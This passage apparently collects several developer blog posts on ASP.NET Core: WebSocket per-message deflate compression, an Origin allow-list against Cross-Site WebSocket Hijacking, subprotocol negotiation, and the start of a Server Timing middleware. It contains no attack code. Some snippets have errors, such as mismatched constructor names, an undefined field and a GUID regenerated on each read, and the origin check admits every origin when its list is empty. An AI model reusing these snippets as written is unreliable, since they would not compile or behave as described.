This is my third post about WebSocket protocol in ASP.NET Core. Previously I've written about subprotocol negotiation and Cross-Site WebSocket Hijacking. The subject I'm focusing on here is the per-message compression which is out of the box supported by Chrome, FireFox and other browsers.

WebSocket Extensions

The WebSocket protocol has a concept of extensions, which can provide new capabilities. An extension can define any additional functionality which is able to work on top of the WebSocket framing layer. The specification reserves three bits of header (RSV1, RSV2 and RSV3) and all opcodes from 3 to 7 and 11 to 15 to be used by extensions (it also allows for using the reserved bits in order to create additional opcodes or even using some of the payload data for that purpose). The extensions (similarly to subprotocol) are being negotiated through dedicated header (Sec-WebSocket-Extensions) as part of the handshake. A client can advertise the supported extensions by putting the list into the header and server can accept one or more in the exactly same way.

There are two extensions I have heard of: A Multiplexing Extension for WebSockets and Compression Extensions for WebSocket. The first one has never gone beyond draft but the second has become a standard and got adopted by several browsers.

WebSocket Per-Message Compression Extensions

The Compression Extensions for WebSocket standard defines two things. First is a framework for adding compression functionality to the WebSocket protocol. The framework is really simple, it states only two things:

  • Per-Message Compression Extension operates only on message data (so compression takes place before spliting into frames and decompression takes place after all frames have been received).
  • Per-Message Compression Extension allocates the RSV1 bit and calls it the Per-Message Compressed bit. The bit is supposed to be set to 1 on first frame of compressed message.

The challenging part is the allocation of the RSV1 bit. It makes it impossible to implement support for per-message compression on top of the WebSocket stack available in ASP.NET Core. Because of that I've decided to roll my own implementation for IHttpWebSocketFeature. It is very similar to one provided by Microsoft.AspNetCore.WebSockets and the underlying WebSocket implementation is based on ManagedWebSocket so closely that needed changes can be described in its context (the key difference is that my implementation is stripped from the client specific logic as it is not needed).

From the public API perspective there must be way to set and get the information that message is compressed. First can be achieved with overload of SendAsync method (or more like extending the current SendAsync with one more parameter and providing overload which doesn't need it).

internal class CompressionWebSocket : WebSocket
{
    public override Task SendAsync(ArraySegment<byte> buffer, WebSocketMessageType messageType,
        bool endOfMessage, CancellationToken cancellationToken)
    {
        return SendAsync(buffer, messageType, false, endOfMessage, cancellationToken);
    }

    public Task SendAsync(ArraySegment<byte> buffer, WebSocketMessageType messageType, bool compressed,
        bool endOfMessage, CancellationToken cancellationToken)
    {
        ...;
    }
}

The information about a received message can be exposed through a delivered WebSocketReceiveResult.

public class CompressionWebSocketReceiveResult : WebSocketReceiveResult
{
    public bool Compressed { get; }

    public CompressionWebSocketReceiveResult(int count, WebSocketMessageType messageType,
        bool compressed, bool endOfMessage)
        : base(count, messageType, endOfMessage)
    {
        Compressed = compressed;
    }

    public CompressionWebSocketReceiveResult(int count, WebSocketMessageType messageType,
        bool endOfMessage, WebSocketCloseStatus? closeStatus, string closeStatusDescription)
        : base(count, messageType, endOfMessage, closeStatus, closeStatusDescription)
    {
        Compressed = false;
    }
}

Next step is adjusting the internals of the WebScoket implementation to properly write and read the RSV1 bit. The writing part is being handled by the WriteHeader method. This method needs to be changed in a way that it sets the RSV1 bit when the messages is compressed and current frame is not a continuation.

private static int WriteHeader(WebSocketMessageOpcode opcode, byte[] sendBuffer,
    ArraySegment<byte> payload, bool compressed, bool endOfMessage)
{
    sendBuffer[0] = (byte)opcode;

    if (compressed && (opcode != WebSocketMessageOpcode.Continuation))
    {
        sendBuffer[0] |= 0x40;
    }

    if (endOfMessage)
    {
        sendBuffer[0] |= 0x80;
    }

    ...
}

After this change all the paths leading to WriteHeader method must be changed to either provide (passed down) value of compressed parameter from SendAsync or false.

The receiving flow has a corresponding method TryParseMessageHeaderFromReceiveBuffer which fills out a MessageHeader struct. A different version of that struct is needed.

[StructLayout(LayoutKind.Auto)]
internal struct CompressionWebSocketMessageHeader
{
    internal WebSocketMessageOpcode Opcode { get; set; }

    internal bool Compressed { get; set; }

    internal bool Fin { get; set; }

    internal long PayloadLength { get; set; }

    internal int Mask { get; set; }
}

The TryParseMessageHeaderFromReceiveBuffer method will require two changes. One will take care of reading the RSV1 bit and the second will change the validation of all RSV bits values (per protocol specification invalid combination of RSV bits must fail the connection).

private bool TryParseMessageHeaderFromReceiveBuffer(out CompressionWebSocketMessageHeader resultHeader)
{
    var header = new CompressionWebSocketMessageHeader();

    header.Opcode = (WebSocketMessageOpcode)(_receiveBuffer[_receiveBufferOffset] & 0xF);
    header.Compressed = (_receiveBuffer[_receiveBufferOffset] & 0x40) != 0;
    header.Fin = (_receiveBuffer[_receiveBufferOffset] & 0x80) != 0;

    bool reservedSet = (_receiveBuffer[_receiveBufferOffset] & 0x70) != 0;
    bool reservedExceptCompressedSet = (_receiveBuffer[_receiveBufferOffset] & 0x30) != 0;

    ...

    bool shouldFail = (!header.Compressed && reservedSet) || reservedExceptCompressedSet;

    ...
}

The last step is to modify InternalReceiveAsync method so it skips UTF-8 validation for compressed messages and properly creates CompressionWebSocketReceiveResult.

private async Task<WebSocketReceiveResult> InternalReceiveAsync(ArraySegment<byte> payloadBuffer,
    CancellationToken cancellationToken)
{
    ...

    try
    {
        while (true)
        {
            ...

            if ((header.Opcode == WebSocketMessageOpcode.Text) && !header.Compressed
                && !TryValidateUtf8(
                    new ArraySegment<byte>(payloadBuffer.Array, payloadBuffer.Offset, bytesToCopy),
                    header.Fin, _utf8TextState))
            {
                await CloseWithReceiveErrorAndThrowAsync(WebSocketCloseStatus.InvalidPayloadData,
                    WebSocketError.Faulted, cancellationToken).ConfigureAwait(false);
            }

            _lastReceiveHeader = header;
            return new CompressionWebSocketReceiveResult(
                bytesToCopy,
                header.Opcode == WebSocketMessageOpcode.Text ?
                    WebSocketMessageType.Text : WebSocketMessageType.Binary,
                header.Compressed,
                bytesToCopy == 0 || (header.Fin && header.PayloadLength == 0));
        }
    }
    catch (Exception ex)
    {
        ...
    }
    finally
    {
        ...
    }
}

With those changes in place the WebSocket implementation has support for per-message compression framework. A support for specific compression extension can be implemented on top of that.

Deflate based PMCE

The second thing which Compression Extensions for WebSocket standard defines is permessage-deflate compression extension. This extension specifies a way of compressesing message payload using the DEFLATE algorithm with help of the byte boundary alignment method. But first it is worth to implement concepts which are shared by all potential compression extensions - receiving and sending the message payload. Methods responsible for handling those operations should be able to properly concatenate or split the message into frames.

public abstract class WebSocketCompressionProviderBase
{
    private readonly int? _sendSegmentSize;

    ...

    protected async Task SendMessageAsync(WebSocket webSocket, byte[] message,
        WebSocketMessageType messageType, bool compressed, CancellationToken cancellationToken)
    {
        if (webSocket.State == WebSocketState.Open)
        {
            if (_sendSegmentSize.HasValue && (_sendSegmentSize.Value < message.Length))
            {
                int messageOffset = 0;
                int messageBytesToSend = message.Length;

                while (messageBytesToSend > 0)
                {
                    int messageSegmentSize = Math.Min(_sendSegmentSize.Value, messageBytesToSend);
                    ArraySegment<byte> messageSegment = new ArraySegment<byte>(message, messageOffset,
                        messageSegmentSize);

                    messageOffset += messageSegmentSize;
                    messageBytesToSend -= messageSegmentSize;

                    await SendAsync(webSocket, messageSegment, messageType, compressed,
                        (messageBytesToSend == 0), cancellationToken);
                }
            }
            else
            {
                ArraySegment<byte> messageSegment = new ArraySegment<byte>(message, 0, message.Length);

                await SendAsync(webSocket, messageSegment, messageType, compressed, true,
                    cancellationToken);
            }
        }
    }

    private Task SendAsync(WebSocket webSocket, ArraySegment<byte> messageSegment,
        WebSocketMessageType messageType, bool compressed, bool endOfMessage,
        CancellationToken cancellationToken)
    {
        if (compressed)
        {
            CompressionWebSocket compressionWebSocket = (webSocket as CompressionWebSocket)
            ?? throw new InvalidOperationException($"Used WebSocket must be CompressionWebSocket.");

            return compressionWebSocket.SendAsync(messageSegment, messageType, true, endOfMessage,
                cancellationToken);
        }
        else
        {
            return webSocket.SendAsync(messageSegment, messageType, endOfMessage, cancellationToken);
        }
    }

    protected async Task<byte[]> ReceiveMessagePayloadAsync(WebSocket webSocket,
        WebSocketReceiveResult webSocketReceiveResult, byte[] receivePayloadBuffer)
    {
        byte[] messagePayload = null;

        if (webSocketReceiveResult.EndOfMessage)
        {
            messagePayload = new byte[webSocketReceiveResult.Count];
            Array.Copy(receivePayloadBuffer, messagePayload, webSocketReceiveResult.Count);
        }
        else
        {
            IEnumerable<byte> webSocketReceivedBytesEnumerable = Enumerable.Empty<byte>();
            webSocketReceivedBytesEnumerable = webSocketReceivedBytesEnumerable
                .Concat(receivePayloadBuffer);

            while (!webSocketReceiveResult.EndOfMessage)
            {
                webSocketReceiveResult = await webSocket.ReceiveAsync(
                    new ArraySegment<byte>(receivePayloadBuffer), CancellationToken.None);
                webSocketReceivedBytesEnumerable = webSocketReceivedBytesEnumerable
                    .Concat(receivePayloadBuffer.Take(webSocketReceiveResult.Count));
            }

            messagePayload = webSocketReceivedBytesEnumerable.ToArray();
        }

        return messagePayload;
    }
}

With this base the permessage-deflate specifics can be implemented. Let's start with the byte boundary alignment method. In practice it boils down to two operations:

  • In case of compression operation the compressed data should end with empty deflate block and last four octets of that block removed.
  • In case of decompression operation last four octets of empty deflate block should be appended to the received payload before decompression.

It looks that in case of compressing with DeflateStream provided by .NET the empty deflate block is always there, so the above can be implemented with two helper methods.

public sealed class WebSocketDeflateCompressionProvider : WebSocketCompressionProviderBase
{
    private static readonly byte[] LAST_FOUR_OCTETS = new byte[] { 0x00, 0x00, 0xFF, 0xFF };
    ...

    private byte[] TrimLastFourOctetsOfEmptyNonCompressedDeflateBlock(byte[] compressedMessagePayload)
    {
        int lastFourOctetsOfEmptyNonCompressedDeflateBlockPosition = 0;
        for (int position = compressedMessagePayload.Length - 1; position >= 4; position--)
        {
            if ((compressedMessagePayload[position - 3] == LAST_FOUR_OCTETS[0])
                && (compressedMessagePayload[position - 2] == LAST_FOUR_OCTETS[1])
                && (compressedMessagePayload[position - 1] == LAST_FOUR_OCTETS[2])
                && (compressedMessagePayload[position] == LAST_FOUR_OCTETS[3]))
            {
                lastFourOctetsOfEmptyNonCompressedDeflateBlockPosition = position - 3;
                break;
            }
        }
        Array.Resize(ref compressedMessagePayload, lastFourOctetsOfEmptyNonCompressedDeflateBlockPosition);

        return compressedMessagePayload;
    }

    private byte[] AppendLastFourOctetsOfEmptyNonCompressedDeflateBlock(byte[] compressedMessagePayload)
    {
        Array.Resize(ref compressedMessagePayload, compressedMessagePayload.Length + 4);

        compressedMessagePayload[compressedMessagePayload.Length - 4] = LAST_FOUR_OCTETS[0];
        compressedMessagePayload[compressedMessagePayload.Length - 3] = LAST_FOUR_OCTETS[1];
        compressedMessagePayload[compressedMessagePayload.Length - 2] = LAST_FOUR_OCTETS[2];
        compressedMessagePayload[compressedMessagePayload.Length - 1] = LAST_FOUR_OCTETS[3];

        return compressedMessagePayload;
    }
}

The second set of helper methods which will be needed is the actual compression and decompression. For simplicity purposes only text messages will be considered from this point.

public sealed class WebSocketDeflateCompressionProvider : WebSocketCompressionProviderBase
{
    ...
    private static readonly Encoding UTF8_WITHOUT_BOM = new UTF8Encoding(false);

    ...

    private async Task<byte[]> CompressTextWithDeflateAsync(string message)
    {
        byte[] compressedMessagePayload = null;

        using (MemoryStream compressedMessagePayloadStream = new MemoryStream())
        {
            using (DeflateStream compressedMessagePayloadCompressStream =
                new DeflateStream(compressedMessagePayloadStream, CompressionMode.Compress))
            {
                using (StreamWriter compressedMessagePayloadCompressWriter =
                    new StreamWriter(compressedMessagePayloadCompressStream, UTF8_WITHOUT_BOM))
                {
                    await compressedMessagePayloadCompressWriter.WriteAsync(message);
                }
            }

            compressedMessagePayload = compressedMessagePayloadStream.ToArray();
        }

        return compressedMessagePayload;
    }

    private async Task<string> DecompressTextWithDeflateAsync(byte[] compressedMessagePayload)
    {
        string message = null;

        using (MemoryStream compressedMessagePayloadStream = new MemoryStream(compressedMessagePayload))
        {
            using (DeflateStream compressedMessagePayloadDecompressStream =
                new DeflateStream(compressedMessagePayloadStream, CompressionMode.Decompress))
            {
                using (StreamReader compressedMessagePayloadDecompressReader =
                    new StreamReader(compressedMessagePayloadDecompressStream, UTF8_WITHOUT_BOM))
                {
                    message = await compressedMessagePayloadDecompressReader.ReadToEndAsync();
                }
            }
        }

        return message;
    }
}

Now the public API can be exposed.

public interface IWebSocketCompressionProvider
{
    Task CompressTextMessageAsync(WebSocket webSocket, string message,
        CancellationToken cancellationToken);

    Task<string> DecompressTextMessageAsync(WebSocket webSocket,
        WebSocketReceiveResult webSocketReceiveResult, byte[] receivePayloadBuffer);
}

public sealed class WebSocketDeflateCompressionProvider :
    WebSocketCompressionProviderBase, IWebSocketCompressionProvider
{
    ...

    public override async Task CompressTextMessageAsync(WebSocket webSocket, string message,
        CancellationToken cancellationToken)
    {
        byte[] compressedMessagePayload = await CompressTextWithDeflateAsync(message);

        compressedMessagePayload =
            TrimLastFourOctetsOfEmptyNonCompressedDeflateBlock(compressedMessagePayload);

        await SendMessageAsync(webSocket, compressedMessagePayload, WebSocketMessageType.Text, true,
            cancellationToken);
    }

    public override async Task<string> DecompressTextMessageAsync(WebSocket webSocket,
        WebSocketReceiveResult webSocketReceiveResult, byte[] receivePayloadBuffer)
    {
        string message = null;

        CompressionWebSocketReceiveResult compressionWebSocketReceiveResult =
            webSocketReceiveResult as CompressionWebSocketReceiveResult;

        if ((compressionWebSocketReceiveResult != null) && compressionWebSocketReceiveResult.Compressed)
        {
            byte[] compressedMessagePayload =
                await ReceiveMessagePayloadAsync(webSocket, webSocketReceiveResult, receivePayloadBuffer);

            compressedMessagePayload =
                AppendLastFourOctetsOfEmptyNonCompressedDeflateBlock(compressedMessagePayload);

            message = await DecompressTextWithDeflateAsync(compressedMessagePayload);
        }
        else
        {
            byte[] messagePayload =
                await ReceiveMessagePayloadAsync(webSocket, webSocketReceiveResult, receivePayloadBuffer);

            message = Encoding.UTF8.GetString(messagePayload);
        }

        return message;
    }

    ...
}

This API makes it easy to plug in a compression provider into typical (SendAsync and ReceiveAsync based) flow for WebSocket by replacing calls to SendAsync with calls to CompressTextMessageAsync and calling DecompressTextMessageAsync whenever the WebSocketReceiveResult acquired from ReceiveAsync indicates a text message. But before this can be done the permessage-deflate extension must be properly negotiated.

Context takeover and LZ77 window size

An important part of compression extension negotiation are parameters. The permessage-deflate defines four of them: server_no_context_takeover, client_no_context_takeover, server_max_window_bits and client_max_window_bits. First two define if server and/or client can reuse the same context (LZ77 sliding window) for subsequent messages. The remaining two allow for limiting the LZ77 sliding window size. The sad truth is that the above implementation is not able to handle most of this parameters properly, so the negotiation process needs to make sure that the acceptable values are beign used or negotiation fails (failing of negotiation doesn't fail the connection, the handshake response simply doesn't contain the extension as accepted one). So what are the acceptable values for this implementation?

The DeflateStream doesn't provide control over LZ77 sliding window size which means that the negotiation must be failed if offer contains server_max_window_bits parameter as it can't be handled. At the same time the presence of client_max_window_bits should be ignored as this is just a hint that client can support this parameter.

When it comes to the context reuse the above implementation creates new DeflateStream for every message which means it always work in "no context takeover" mode. Because of that the negiotation response must prevent client from reusing the context - the client_no_context_takeover must always be included in the response. This also means that server_no_context_takeover send by client in the offer can always be accepted.

I'm skipping the code which handles the negotiation here. Despite being based on NameValueWithParametersHeaderValue class which handles all the parsing it is still quite lengthy (it also must validate the parameters for "technical correctness"). For anyone who is interested the implementation is split between WebSocketCompressionService and WebSocketDeflateCompressionOptions classes which can be found at GitHub (link below).

Trying this out

There was an issue in Microsoft.AspNetCore.WebSockets repository for implementing per-message compression. It's currently closed, so I've made this implementation available independently on GitHub and NuGet. It is also part of my WebSocket demo project if somebody is looking for ready to use playground.

In my previous post I've written about subprotocols in WebSocket protocol. This time I wanted to focus on Cross-Site WebSocket Hijacking vulnerability.

Cross-Site WebSocket Hijacking

The WebSocket protocol is not a subject to same-origin policy. The specification states that "Servers that are not intended to process input from any web page but only for certain sites SHOULD verify the |Origin| field is an origin they expect.". This means that browser will allow any page to open a WebSocket connection.

Let's imagine a scenario in which the application is sending sensitive data over a WebSocket and authentication is based on cookies which are being send as a part of the initial handshake. In such case if user visits a malicious page while being logged to the application that page can open an authenticated WebSocket connection because browser will automatically send all the cookies. This is quite common and (if not protected) dangerous scenario. There are also more "interesting" scenarios possible like this case of remote code execution.

Protecting against CSWSH

Protection against CSWSH is easy to implement. As the Origin header is required part of initial handshake the application should check its value against list of acceptable origins and if it's not there respond with 403 Forbidden status code. The sample from my previous post was using WebSocketConnectionsMiddleware for handling the connections which makes it a perfect place to add this check.

public class WebSocketConnectionsOptions
{
    public HashSet<string> AllowedOrigins { get; set; }
}

public class WebSocketConnectionsMiddleware
{
    private WebSocketConnectionsOptions _options;
    ...

    public WebSocketConnectionsMiddleware(RequestDelegate next, WebSocketConnectionsOptions options, ...)
    {
        _options = options ?? throw new ArgumentNullException(nameof(options));
        ...
    }

    public async Task Invoke(HttpContext context)
    {
        if (context.WebSockets.IsWebSocketRequest)
        {
            if (ValidateOrigin(context))
            {
                ...
            }
            else
            {
                context.Response.StatusCode = StatusCodes.Status403Forbidden;
            }
        }
        else
        {
            context.Response.StatusCode = StatusCodes.Status400BadRequest;
        }
    }

    private bool ValidateOrigin(HttpContext context)
    {
        return (_options.AllowedOrigins == null)
            || (_options.AllowedOrigins.Count == 0)
            || (_options.AllowedOrigins.Contains(context.Request.Headers["Origin"].ToString()));
    }

    ...
}

Now the list of acceptable origins can be passed during the middleware registration.

public class Startup
{
    ...

    public void Configure(IApplicationBuilder app)
    {
        ...

        WebSocketConnectionsOptions webSocketConnectionsOptions = new WebSocketConnectionsOptions
        {
            AllowedOrigins = new HashSet<string> { "http://localhost:63290" }
        };

        ...
        app.UseWebSockets();
        app.Map("/socket", branchedApp =>
        {
            branchedApp.UseMiddleware<WebSocketConnectionsMiddleware>(webSocketConnectionsOptions);
        });
        ...
    }
}

I've extended the demo available at GitHub with this functionality.

WebSocket is the closest API to a network socket available in browser. This makes it probably the most flexible transport which a web application can use. That flexibility comes at price. From WebSocket perspective the message content is opaque, it only provides distinction between text and binary data. There is also no ready to use mechanism for communicating additional metadata. This means that client and server must agree on application subprotocol. This isn't something problematic as long as the scenario is simple, but the moment there are clients which are not in our control and we want to evolve the subprotocol a problem rises. WebSocket provides a solution for this problem in form of simple subprotocol negotiation mechanism and the Microsoft.AspNetCore.WebSockets package, which provides low-level WebSocket support for ASP.NET Core, fully supports it.

Sample scenario

The sample scenario will be a very simple web application, which regularly receives plain text messages over WebSocket and displays them to users. The relevant part of client side code is the below snippet.

var handleWebSocketPlainTextData = function(data) {
    ...
};

var webSocket = new WebSocket('ws://example.com/socket');

webSocket.onmessage = function(message) {
    handleWebSocketPlainTextData(message.data);
};

On server side there is simple middleware which manages WebSocket connections.

public class WebSocketConnectionsMiddleware
{
    private IWebSocketConnectionsService _connectionsService;


    public WebSocketSubprotocolsMiddleware(RequestDelegate next,
        IWebSocketConnectionsService connectionsService)
    {
        _connectionsService = connectionsService ??
            throw new ArgumentNullException(nameof(connectionsService));
    }

    public async Task Invoke(HttpContext context)
    {
        if (context.WebSockets.IsWebSocketRequest)
        {
            WebSocket webSocket = await context.WebSockets.AcceptWebSocketAsync();

            WebSocketConnection webSocketConnection = new WebSocketConnection(webSocket);

            _connectionsService.AddConnection(webSocketConnection);

            byte[] webSocketBuffer = new byte[1024 * 4];
            WebSocketReceiveResult webSocketReceiveResult = await webSocket.ReceiveAsync(
                new ArraySegment<byte>(webSocketBuffer), CancellationToken.None);
            if (webSocketReceiveResult.MessageType != WebSocketMessageType.Close)
            {
                ...
            }
            await webSocket.CloseAsync(webSocketReceiveResult.CloseStatus.Value,
                webSocketReceiveResult.CloseStatusDescription, CancellationToken.None);

            _connectionsService.RemoveConnection(webSocketConnection.Id);
        }
        else
        {
            context.Response.StatusCode = 400;
        }
    }
}

The IWebSocketConnectionsService implementation is managing connections with help of ConcurrentDictionary and WebSocketConnection is a wrapper around WebSocket class which abstracts the low-level aspects of the API.

public class WebSocketConnection
{
    private WebSocket _webSocket;

    public Guid Id => Guid.NewGuid();

    public WebSocketConnection(WebSocket webSocket)
    {
        _webSocket = webSocket ?? throw new ArgumentNullException(nameof(webSocket));
    }

    public async Task SendAsync(string message, CancellationToken cancellationToken)
    {
        if (_webSocket.State == WebSocketState.Open)
        {
            ArraySegment<byte> buffer = new ArraySegment<byte>(Encoding.ASCII.GetBytes(message),
                0, message.Length);

            await _webSocket.SendAsync(buffer, WebSocketMessageType.Text, true, cancellationToken);
        }
    }

    ...
}

The goal is to introduce new (JSON based) subprotocol which will allow sending additional metadata, but the backward compatibility is also required.

Abstracting the subprotocol

First an abstraction of subprotocol is needed. The abstraction needs to provide the name of the subprotocol and methods for sending/receiving. In general the application will still be sending text based messages so following interface should be sufficient.

public interface ITextWebSocketSubprotocol
{
    string SubProtocol { get; }

    Task SendAsync(string message, WebSocket webSocket, CancellationToken cancellationToken);

    ...
}

The implementation for the plain text version can be extracted from WebSocketConnection.

public class PlainTextWebSocketSubprotocol : ITextWebSocketSubprotocol
{
    public string SubProtocol => "aspnetcore-ws.plaintext";

    public async Task SendAsync(string message, WebSocket webSocket,
        CancellationToken cancellationToken)
    {
        if (webSocket.State == WebSocketState.Open)
        {
            ArraySegment<byte> buffer = new ArraySegment<byte>(Encoding.ASCII.GetBytes(message),
                0, message.Length);

            await webSocket.SendAsync(buffer, WebSocketMessageType.Text, true, cancellationToken);
        }
    }

    ...
}

This means that WebSocketConnection should now be dependent on the subprotocol abstraction.

public class WebSocketConnection
{
    private WebSocket _webSocket;
    private ITextWebSocketSubprotocol _subProtocol;

    public Guid Id => Guid.NewGuid();

    public WebSocketConnection(WebSocket webSocket, ITextWebSocketSubprotocol subProtocol)
    {
        _webSocket = webSocket ?? throw new ArgumentNullException(nameof(webSocket));
        _subProtocol = subProtocol ?? throw new ArgumentNullException(nameof(subProtocol));
    }

    public Task SendAsync(string message, CancellationToken cancellationToken)
    {
        return _subProtocol.SendAsync(message, _webSocket, cancellationToken);
    }

    ...
}

Also a small adjustion to the middleware is needed.

public class WebSocketConnectionsMiddleware
{
    private readonly ITextWebSocketSubprotocol _defaultSubProtocol;
    private IWebSocketConnectionsService _connectionsService;


    public WebSocketSubprotocolsMiddleware(RequestDelegate next,
        IWebSocketConnectionsService connectionsService)
    {
        _defaultSubProtocol = new PlainTextWebSocketSubprotocol();
        _connectionsService = connectionsService ??
            throw new ArgumentNullException(nameof(connectionsService));
    }

    public async Task Invoke(HttpContext context)
    {
        if (context.WebSockets.IsWebSocketRequest)
        {
            WebSocket webSocket = await context.WebSockets.AcceptWebSocketAsync();

            WebSocketConnection webSocketConnection = new WebSocketConnection(webSocket,
                _defaultSubProtocol);

            ...
        }
        else
        {
            context.Response.StatusCode = 400;
        }
    }
}

Now the infrastructure needed for introducing a second subprotocol is in place. It will be a JSON based subprotocol which in addition to the message provides a timestamp.

public class JsonWebSocketSubprotocol : ITextWebSocketSubprotocol
{
    public string SubProtocol => "aspnetcore-ws.json";

    public async Task SendAsync(string message, WebSocket webSocket,
        CancellationToken cancellationToken)
    {
        if (webSocket.State == WebSocketState.Open)
        {
            string jsonMessage = JsonConvert.SerializeObject(new {
                message,
                timestamp = DateTime.UtcNow
            });

            ArraySegment<byte> buffer = new ArraySegment<byte>(Encoding.ASCII.GetBytes(jsonMessage),
                0, jsonMessage.Length);

            await webSocket.SendAsync(buffer, WebSocketMessageType.Text, true, cancellationToken);
        }
    }
}

Subprotocol negotiation

The subprotocol negotiation starts on the client side. As part of the WebSocket object constructor an array of supported subprotocols can be provided. If the negotiation succeeds the information about chosen subprotocol is available through protocol attribute of WebSocket instance.

var handleWebSocketPlainTextData = function(data) {
    ...
};

var handleWebSocketJsonData = function(data) {
    ...
};

var webSocket = new WebSocket('ws://example.com/socket',
    ['aspnetcore-ws.plaintext', 'aspnetcore-ws.json']);

webSocket.onmessage = function(message) {
    if (webSocket.protocol == 'aspnetcore-ws.json') {
        handleWebSocketJsonData(message.data);
    } else {
        handleWebSocketPlainTextData(message.data);
    }
};

The advertised subprotocols are transferred to the server as part of the connection handshake in Sec-WebSocket-Protocol header. On the server side this list is available through HttpContext.WebSockets.WebSocketRequestedProtocols property. The server completes handshake by providing the name of selected subprotocol as parameter to HttpContext.WebSockets.AcceptWebSocketAsync method.

The rules of subprotocol negotiation are simple. If the client has advertised a list of subprotocols the server must choose one of them. If the client hasn't advertised any subprotocols the server can't provide a subprotocol name as part of handshake. The best place to implement those rules seems to be the middleware.

There is also no way for client to specify a preference between subprotocols, the choice is entirely up to the server. In the below code the available subprotocols are being kept as a list and order on that list represents preference.

public class WebSocketConnectionsMiddleware
{
    private readonly ITextWebSocketSubprotocol _defaultSubProtocol;
    private readonly IList<ITextWebSocketSubprotocol> _supportedSubProtocols;
    private IWebSocketConnectionsService _connectionsService;


    public WebSocketSubprotocolsMiddleware(RequestDelegate next,
        IWebSocketConnectionsService connectionsService)
    {
        _defaultSubProtocol = new PlainTextWebSocketSubprotocol();
        _supportedSubProtocols = new List<ITextWebSocketSubprotocol>
        {
            new JsonWebSocketSubprotocol(),
            _defaultSubProtocol
        }
        _connectionsService = connectionsService ??
            throw new ArgumentNullException(nameof(connectionsService));
    }

    public async Task Invoke(HttpContext context)
    {
        if (context.WebSockets.IsWebSocketRequest)
        {
            ITextWebSocketSubprotocol subProtocol =
                NegotiateSubProtocol(context.WebSockets.WebSocketRequestedProtocols);

            WebSocket webSocket =
                await context.WebSockets.AcceptWebSocketAsync(subProtocol?.SubProtocol);

            WebSocketConnection webSocketConnection =
                new WebSocketConnection(webSocket, subProtocol ?? _defaultSubProtocol);

            ...
        }
        else
        {
            context.Response.StatusCode = 400;
        }
    }

    private ITextWebSocketSubprotocol NegotiateSubProtocol(IList<string> requestedSubProtocols)
    {
        ITextWebSocketSubprotocol subProtocol = null;

        foreach (ITextWebSocketSubprotocol supportedSubProtocol in _options.SupportedSubProtocols)
        {
            if (requestedSubProtocols.Contains(supportedSubProtocol.SubProtocol))
            {
                subProtocol = supportedSubProtocol;
                break;
            }
        }

        return subProtocol;
    }
}

With this implementation all the possible clients which are not supporting the new subprotocol will continue to work without any changes, they will not advertise any subprotocols and server will use the default one without providing the name as part of the handshake. Meantime our application, which advertises support for new protocol, will use it because it is the one preferred by the server.

It is also worth to mention that subprotocols are not meant only for the internal purposes. There is a number of well known subprotocols which registry is available here.

The demo project is available on GitHub, it should be a good starting point for playing with WebSocket subprotocol negotiation.

There is a number of Web APIs which allow measuring performance of web applications:

The youngest member of the family is Server Timing API which allows communicating the server performance metrics to the client. The API is not widely supported yet, but the Chrome Devtools is able to interpret the information send from the server and expose it as part of request timing information. Let's see how this feature can be utilized from ASP.NET Core.

Basics of Server Timing API

The Server Timing definition of metric can be represented by following structure.

public struct ServerTimingMetric
{
    private string _serverTimingMetric;

    public string Name { get; }

    public decimal? Value { get; }

    public string Description { get; }

    public ServerTimingMetric(string name, decimal? value, string description)
    {
        if (String.IsNullOrEmpty(name))
            throw new ArgumentNullException(nameof(name));

        Name = name;
        Value = value;
        Description = description;

        _serverTimingMetric = null;
    }

    public override string ToString()
    {
        if (_serverTimingMetric == null)
        {
            _serverTimingMetric = Name;

            if (Value.HasValue)
                _serverTimingMetric = _serverTimingMetric + "=" + Value.Value.ToString(CultureInfo.InvariantCulture);

            if (!String.IsNullOrEmpty(Description))
                _serverTimingMetric = _serverTimingMetric + ";\"" + Description + "\"";
        }

        return _serverTimingMetric;
    }
}

The only required property is name, which means that metric can be used for indication that something has happened without any related duration information.

The metrics are delivered to the client through Server-Timing response header. The header may occur multiple times in the response, which means that multiple metrics can be delivered through multiple headers or as single comma-separated list (or combination of both). A class representing the header value could look like below.

public class ServerTimingHeaderValue
{
    public ICollection<ServerTimingMetric> Metrics { get; }

    public ServerTimingHeaderValue()
    {
        Metrics = new List<ServerTimingMetric>();
    }

    public override string ToString()
    {
        return String.Join(",", Metrics);
    }
}

Knowing how to construct the header we can try to feed the Chrome Devtools with some information. First we can write an extension method which will simplify adding header to the response.

public static class HttpResponseHeadersExtensions
{
    public static void SetServerTiming(this HttpResponse response, params ServerTimingMetric[] metrics)
    {
        ServerTimingHeaderValue serverTiming = new ServerTimingHeaderValue();

        foreach (ServerTimingMetric metric in metrics)
        {
            serverTiming.Metrics.Add(metric);
        }

        response.Headers.Append("Server-Timing", serverTiming.ToString());
    }
}

Now we can create an empty web application and use the extension method for setting some metrics.

public class Startup
{
    ...

    public void Configure(IApplicationBuilder app)
    {
        ...

        app.Run(async (context) =>
        {
            context.Response.SetServerTiming(
                new ServerTimingMetric("cache", 300, "Cache"),
                new ServerTimingMetric("sql", 900, "Sql Server"),
                new ServerTimingMetric("fs", 600, "FileSystem"),
                new ServerTimingMetric("cpu", 1230, "Total CPU")
            );

            await context.Response.WriteAsync("-- Demo.AspNetCore.ServerTiming --");
        });
    }
}

After hitting F5 and navigating to the demo application in Chrome the metrics should be visible in the Chrome Devtools.

Chrome Network Tab - Server Timing

Making it more usable

The above demo shows that Server Timing API works, but from developer perspective we would want an easy way for providing metrics from different places in the application. In case of ASP.NET Core it usually means middleware and service.

The service can be quite simple, it just needs to expose the collection of metrics

public interface IServerTiming
{
    ICollection<ServerTimingMetric> Metrics { get; }
}

internal class ServerTiming : IServerTiming
{
    public ICollection<ServerTimingMetric> Metrics { get; }

    public ServerTiming()
    {
        Metrics = new List<ServerTimingMetric>();
    }
}

The important part is that metrics needs to be collected per request. This can be achieved by properly scoping the service at registration.

public static class ServerTimingServiceCollectionExtensions
{
    public static IServiceCollection AddServerTiming(this IServiceCollection services)
    {
        services.AddScoped<IServerTiming, ServerTiming>();

        return services;
    }
}

The missing part is the middleware which will set the Server-Timing header with the metrics gathered by the service. The tricky part is that the header value should be set as late as possible (so there is a chance for other components in pipeline to provide metrics). Setting the header value before invoking next step in pipeline would be usually to early while trying to do so after that might result in error as headers could have already been sent to client. The solution to this challenge is HttpResponse.OnStarting method which allows adding a delegate which will be invoked just before sending the response headers.

public class ServerTimingMiddleware
{
    private readonly RequestDelegate _next;

    private static Task _completedTask = Task.FromResult<object>(null);

